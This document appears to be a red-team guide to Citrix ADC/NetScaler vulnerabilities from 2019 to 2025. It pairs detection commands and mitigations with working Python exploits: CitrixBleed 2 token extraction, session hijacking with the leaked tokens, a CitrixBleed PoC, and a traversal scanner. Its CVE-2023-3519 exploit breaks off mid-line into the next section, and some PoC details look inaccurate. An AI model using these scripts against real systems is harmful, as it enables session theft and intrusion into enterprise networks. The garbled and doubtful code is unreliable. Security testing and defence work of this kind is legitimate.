Ultimate Guide to Pentesting Citrix ADC/NetScaler (2019-2025)

Introduction

Citrix Application Delivery Controller (ADC), formerly NetScaler, is a ubiquitous presence in enterprise networks, providing critical load balancing, VPN, and application delivery services. This central role, however, makes it a high-value target for threat actors. This in-depth guide provides a comprehensive, five-year analysis for red teamers and penetration testers on assessing the security posture of Citrix ADC/NetScaler deployments. We will cover all major CVEs from 2019 to 2025, including proof-of-concept (PoC) exploits, default configurations, common misconfigurations, and advanced exploitation techniques.

The Threat Landscape: A Five-Year Retrospective

The last five years have seen a relentless assault on Citrix infrastructure. We've witnessed a continuous stream of critical vulnerabilities, many exploited as zero-days. From the infamous "CitrixBleed" to numerous remote code execution (RCE) flaws, the trend highlights the persistent risk posed by these internet-facing appliances. Attackers, from sophisticated APT groups to ransomware gangs, have consistently leveraged these weaknesses for initial access, lateral movement, and data exfiltration.

Deep Dive into Critical CVEs (2019-2025)

Understanding the most significant vulnerabilities is crucial for any pentesting engagement. Here is a year-by-year breakdown of the most impactful CVEs, complete with technical details and PoCs where available.

2025: The Year of Memory-Based Attacks

CVE-2025-7775 (Critical - CVSS 9.2)

A memory overflow vulnerability leading to Remote Code Execution and/or Denial of Service. This has been actively exploited in the wild.

Detection:

# Check for Gateway, LB, or CR configurations
grep "add authentication vserver" /nsconfig/ns.conf
grep "add vpn vserver" /nsconfig/ns.conf
grep "enable ns feature lb" /nsconfig/ns.conf
grep "add cr vserver .* HDX" /nsconfig/ns.conf

CVE-2025-5777 "CitrixBleed 2" (Critical)

Disclosure: June 17, 2025 | Status: Actively Exploited in the Wild

A memory disclosure vulnerability (out-of-bounds read) in the NetScaler Packet Parsing Engine (nsppe) binary that allows for session token theft and authentication bypass. Over 3,300 internet-connected NetScaler instances were found vulnerable worldwide.

Technical Details:

• Vulnerability Type: Out-of-bounds memory read
• Affected Component: NetScaler Packet Parsing Engine (nsppe)
• Root Cause: Improper memory cleanup before buffer reuse
• Memory Leak: Up to 127 bytes of memory per request
• Attack Vector: Malformed POST request to authentication endpoint
• Impact: Session token disclosure, complete authentication bypass

Affected Versions:

• NetScaler ADC and Gateway 14.1 BEFORE 14.1-47.48
• NetScaler ADC and Gateway 13.1 BEFORE 13.1-59.22
• NetScaler ADC 13.1-FIPS BEFORE 13.1-37.241
• NetScaler ADC 12.1-FIPS BEFORE 12.1-55.330

Exploitation Endpoint:

/p/u/doAuthentication.do

Proof of Concept (PoC) - Exploit:

#!/usr/bin/env python3
# CVE-2025-5777 (CitrixBleed 2) Exploitation PoC
# Extracts session tokens from vulnerable NetScaler instances

import requests
import re
import sys
from urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

def exploit_citrixbleed2(target, port=443):
    """
    Exploit CVE-2025-5777 to leak session tokens from memory
    """
    endpoint = "/p/u/doAuthentication.do"
    url = f"https://{target}:{port}{endpoint}"
    
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
    }
    
    # Malformed request with missing login parameter value
    data = "login="
    
    print(f"[*] Targeting: {url}")
    print(f"[*] Sending malformed authentication request...")
    
    try:
        response = requests.post(
            url, 
            headers=headers, 
            data=data, 
            verify=False, 
            timeout=10
        )
        
        print(f"[*] Response Status: {response.status_code}")
        print(f"[*] Response Length: {len(response.text)} bytes")
        
        # Extract session tokens (NSC_* pattern)
        tokens = re.findall(r'NSC_[A-Za-z0-9_]+', response.text)
        
        # Extract other sensitive patterns
        cookies = re.findall(r'Set-Cookie: ([^;]+)', response.headers.get('Set-Cookie', ''))
        
        if tokens:
            print(f"\n[+] SUCCESS! Session tokens leaked from {target}:")
            for token in set(tokens):
                print(f"    [TOKEN] {token}")
            return tokens
        else:
            print(f"\n[-] No obvious session tokens found")
            print(f"[*] Raw response preview (first 500 chars):")
            print(response.text[:500])
            return None
            
    except requests.exceptions.Timeout:
        print(f"[!] Request timed out - target may be down or blocking")
    except requests.exceptions.ConnectionError:
        print(f"[!] Connection error - target unreachable")
    except Exception as e:
        print(f"[!] Error: {e}")
    
    return None

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python3 citrixbleed2_exploit.py  [port]")
        print("Example: python3 citrixbleed2_exploit.py 192.168.1.100 443")
        sys.exit(1)
    
    target = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 443
    
    exploit_citrixbleed2(target, port)

Proof of Concept (PoC) - Scanner:

#!/usr/bin/env python3
# CVE-2025-5777 Vulnerability Scanner

import requests
import sys
from urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

def check_citrixbleed2(target, port=443):
    """Check if target is vulnerable to CVE-2025-5777"""
    url = f"https://{target}:{port}/p/u/doAuthentication.do"
    
    try:
        response = requests.post(
            url,
            data="login=",
            headers={"Content-Type": "application/x-www-form-urlencoded"},
            verify=False,
            timeout=10
        )
        
        # Check for memory leak indicators
        if response.status_code == 200 and len(response.text) > 100:
            print(f"[!] {target}:{port} may be VULNERABLE to CVE-2025-5777")
            print(f"    Response length: {len(response.text)} bytes")
            return True
        else:
            print(f"[+] {target}:{port} appears patched or not vulnerable")
            return False
            
    except Exception as e:
        print(f"[-] Error checking {target}:{port}: {e}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python3 citrixbleed2_scanner.py  [port]")
        sys.exit(1)
    
    target = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 443
    check_citrixbleed2(target, port)

Detection Commands:

# Check NetScaler version
show ns version

# Check for vulnerable configuration
grep "add authentication vserver" /nsconfig/ns.conf
grep "add vpn vserver" /nsconfig/ns.conf

# Check logs for exploitation attempts
grep "doAuthentication.do" /var/log/httpaccess*.log
grep "login=" /var/log/httpaccess*.log | grep -v "200"

Post-Exploitation - Session Hijacking:

#!/usr/bin/env python3
# Use leaked session token to hijack authenticated session

import requests

def hijack_session(target, session_token):
    """Attempt to use leaked session token"""
    url = f"https://{target}/vpn/index.html"
    
    cookies = {
        "NSC_USER": session_token
    }
    
    try:
        response = requests.get(url, cookies=cookies, verify=False)
        if response.status_code == 200:
            print(f"[+] Session hijack successful!")
            print(f"[+] Authenticated as user with token: {session_token}")
        else:
            print(f"[-] Session hijack failed (HTTP {response.status_code})")
    except Exception as e:
        print(f"[!] Error: {e}")

# Usage
hijack_session("vulnerable-netscaler.com", "NSC_USER_LEAKED_TOKEN")

Indicators of Compromise (IOCs):

• Unusual POST requests to /p/u/doAuthentication.do with minimal or empty parameters
• Session tokens being used from unexpected IP addresses
• Multiple failed authentication attempts followed by successful access
• Anomalous user agent strings in authentication logs
• Lateral movement from NetScaler to internal resources

Mitigation:

• Immediately upgrade to patched versions
• Invalidate all active sessions after patching
• Review authentication logs for suspicious activity
• Implement network segmentation to limit NetScaler access
• Enable MFA for all VPN and Gateway users

2024: Console and Memory Vulnerabilities

CVE-2024-8534 (High - CVSS 7.5)

A memory safety vulnerability in the RDP Proxy implementation that can lead to memory corruption and Denial of Service.

CVE-2024-6235 (Critical - CVSS 9.6)

A sensitive information disclosure vulnerability in NetScaler Console (formerly ADM) that allows unauthorized access to critical data.

2023: The Infamous "CitrixBleed"

CVE-2023-4966 "CitrixBleed" (Critical - CVSS 9.4)

A buffer overflow vulnerability that allowed attackers to leak session tokens, bypassing all authentication methods, including MFA. This was heavily exploited by the LockBit ransomware group.

Proof of Concept (PoC):

import requests

def exploit_citrixbleed(target, port=443):
    url = f"https://{target}:{port}/vpns/portal/scripts/newbm.pl"
    payload = "A" * 65535
    headers = {"User-Agent": "Mozilla/5.0", "NSC_USER": payload}
    try:
        response = requests.get(url, headers=headers, verify=False, timeout=10)
        if "NSC_" in response.text:
            print(f"[+] Potential session token leak detected!")
    except Exception as e:
        print(f"[!] Error: {e}")

exploit_citrixbleed("vulnerable-netscaler.com")

CVE-2023-3519 (Critical - CVSS 9.8)

A remote code execution vulnerability via code injection, actively exploited as a zero-day. Threat actors deployed webshells on critical infrastructure organizations.

Proof of Concept (PoC) - BishopFox:

# This is a conceptual example based on the BishopFox exploit
# Requires NASM and specific ROP gadgets for the target version

import requests
import struct

def exploit_cve_2023_3519(target, port, payload_url):
    SAVED_RIP_OFFSET = 0x1234  # Placeholder
    JMP_RSP_GADGET = 0x5678    # Placeholder
    url = f"https://{target}:{port}/vpns/portal/scripts/newbm.pl"
    payload = b"A" * SAVED_RIP_OFFSET
    payload += struct.pack("

2022: Authentication Bypasses and RCE

CVE-2022-27518 (Critical - CVSS 9.8)

An unauthenticated remote arbitrary code execution vulnerability in appliances configured for SAML SP or IdP functionality. APT5 was observed exploiting this as a zero-day.

CVE-2022-27510 (Critical - CVSS 9.8)

An authentication bypass vulnerability allowing unauthorized access to Gateway user capabilities.

2021: Denial of Service

CVE-2021-22955 (High - CVSS 7.5)

An unauthenticated Denial of Service vulnerability in Citrix ADC configured as a VPN (Gateway).

2020: Information Disclosure and Configuration Issues

CVE-2020-8195 (Medium - CVSS 5.3)

An improper input validation vulnerability causing information disclosure to low-privileged users.

2019: The Precursor - Directory Traversal

CVE-2019-19781 (Critical - CVSS 9.8)

A directory traversal vulnerability leading to unauthenticated remote code execution. This was widely exploited and served as a wake-up call for many organizations.

Proof of Concept (PoC) - Scanner:

import requests

def scan_cve_2019_19781(target, port=443):
    test_url = f"https://{target}:{port}/vpn/../vpns/cfg/smb.conf"
    try:
        response = requests.get(test_url, verify=False, timeout=10)
        if response.status_code == 200 and "workgroup" in response.text.lower():
            print(f"[!!!] {target} is VULNERABLE to CVE-2019-19781")
    except Exception as e:
        print(f"[!] Error scanning {target}: {e}")

scan_cve_2019_19781("vulnerable-netscaler.com")

Metasploit Module:

use exploit/linux/http/citrix_dir_traversal_rce
set RHOSTS <target_ip>
exploit

Exploitation Techniques & Attack Chains

Attackers typically follow a predictable pattern when targeting Citrix ADC:

1. Reconnaissance: Identifying vulnerable instances using tools like Shodan, Censys, and Nuclei.
2. Exploitation: Using public or private exploits to gain initial access.
3. Post-Exploitation: Deploying webshells, harvesting credentials, and moving laterally within the network.

Default Configurations & Common Misconfigurations

• Default Credentials: The nsroot:nsroot default credentials are a common finding.
• Exposed Management Interfaces: The NSIP/management interface should never be exposed to the internet.
• Outdated Firmware: Failure to patch in a timely manner is the most common root cause of compromise.
• Weak Password Policies: Lack of MFA and weak password complexity requirements.
• Improper Network Segmentation: Allowing unrestricted access from the NetScaler to the internal network.

Mitigation & Hardening Guidance

• Patch Management: Maintain a strict and timely patching schedule.
• Network Security: Restrict access to management interfaces and segment the network.
• Authentication: Enforce MFA for all users and administrators.
• Monitoring: Implement robust logging and monitoring to detect anomalous activity.
• Configuration Hardening: Follow Citrix's security best practices and disable unused services.

Conclusion

Citrix ADC/NetScaler remains a critical component of enterprise networks and a prime target for attackers. A proactive security posture, informed by a deep understanding of the evolving threat landscape, is essential for defense. By combining regular patching, robust configuration management, and comprehensive security testing, organizations can significantly reduce their risk of compromise.

References

• [1] CISA - Known Exploited Vulnerabilities Catalog
• [2] Citrix Security Bulletins
• [3] TrustedSec, BishopFox, and other security researcher blogs